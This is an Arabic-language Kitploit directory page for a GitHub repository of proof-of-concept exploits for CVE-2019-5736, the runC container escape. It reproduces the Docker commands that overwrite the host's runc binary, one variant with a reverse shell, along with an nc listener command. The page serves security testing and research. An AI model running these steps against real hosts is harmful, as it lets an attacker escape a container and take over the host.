Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
POC-CVE-2019-5736 — إثباتات مفهوم لاستغلال CVE-2019-5736، وهي ثغرة هروب حاوية runC، مما يوضح كسر الحاوية عبر الصور الخبيثة وأوامر exec. | Kitploit
أدوات/GitHubGitHub/bbrathnayaka/poc-cve-2019-5736
أمن الحاوياتتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالالفريق الأحمرالهروب من الحاوية
GitHubbbrathnayaka/poc-cve-2019-5736

POC-CVE-2019-5736

إثباتات مفهوم لاستغلال CVE-2019-5736، وهي ثغرة هروب حاوية runC، مما يوضح كسر الحاوية عبر الصور الخبيثة وأوامر exec.

عرض المستودع
14منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RunC-CVE-2019-5736

Build Status Build Status Build Status Build Status Build Status


فيديو: https://bit.ly/2WqvILb

تدوينة المدونة: [www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html]

هنا، أود أن أذكر أن المطور الأصلي لهذا الاستغلال هو Yuval Avrahami من Twistlock Labs.

تشغيل POCs

لاحظ أن تشغيل POCs سيؤدي إلى استبدال ثنائي runC على المضيف.

يُنصح بشدة بإنشاء نسخة من ثنائي runC الخاص بك (عادةً في /usr/sbin/runc) قبل تشغيل أحد POCs.

استنساخ المستودع:

root@kitploit:~
$ git clone [email protected]:BBRathnayaka/RunC-CVE-2019-5736.git

POC التنفيذ

يستبدل runc ببرنامج بسيط يطبع سلسلة نصية.

تشغيل POC التنفيذ:

root@kitploit:~
$ docker build -t cve-2019-5736:exec_POC ./RunC-CVE-2019-5736/exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

POC الصورة الخبيثة

يستبدل runc ببرنامج shell عكسي بسيط يتصل بـ localhost:2345.

استمع لـ shell العكسي:

root@kitploit:~
$ nc -nvlp 2345

من shell آخر، قم بتشغيل POC الصورة الخبيثة:

root@kitploit:~
$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC

المرجع

root@kitploit:~
انظر [Twistlock Labs](https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/ "شرح CVE-2019-5763") للحصول على شرح لـ CVE-2019-5736 وPOCs.

يعتمد POC الصورة الخبيثة بشكل كبير على [POC لـ q3k](https://github.com/q3k/cve-2019-5736-poc)، لذا كل الفضل يعود له.
تنزيل الأداة